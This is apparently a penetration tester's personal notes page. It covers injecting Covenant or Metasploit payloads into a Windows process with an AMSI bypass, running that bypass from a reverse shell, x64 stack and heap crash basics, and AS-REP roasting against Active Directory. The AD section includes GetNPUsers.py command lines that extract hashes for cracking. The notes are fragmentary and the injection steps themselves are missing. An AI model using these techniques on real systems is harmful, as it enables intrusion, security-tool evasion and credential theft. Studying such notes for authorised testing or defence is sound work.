Inject Convenant Launcher into a Process

Inject convenant or metasploit payload into a process. This also bypasses AMSI, tested on Windows 10 1909 as of May 2020. Credits to RastaMouse and TheWover. Just documenting usage for note keeping purposes.

1. Generate Convenant payload, or msf x64 payload

Launchers > Binary > Generate > Download

1 rasta-mouse bypass

This does not work if run from IEX (New-Object Net.WebClient).DownloadString(). It does work when copy and pasting into a powershell terminal, such as a nc64.exe reverse shell. Tested on Windows 10 1909, Server 2016 March 2020 update.

Linux x64 heap

Causing SIGSEV for x64: usually happens when program puts long input on stack, which overflows into $rbp. When program tries to return after exiting a function, it returns to 0x4141414141414141 (‘AAAAAAAA’ ), result in crash.

Heap crashes involves: 1. Off-by-one variant, which “SOMETIMES” (also depending on libc version) overwrites the ‘size tracker’ of the next chunk on the heap, as shown in the devel0pment.de blog.

Windows AD Enum

As-Rep Roasting

No creds, but has a list of users in users.txt

while read p; do python3 GetNPUsers.py corp.local/${p} -dc-ip 10.10.10.1 -no-pass; done < users.txt

With creds: corp\attacker:PASSWORD

python3 GetNPUsers.py corp/attacker:PASSWORD -request -format hashcat  -outputfile h1.hash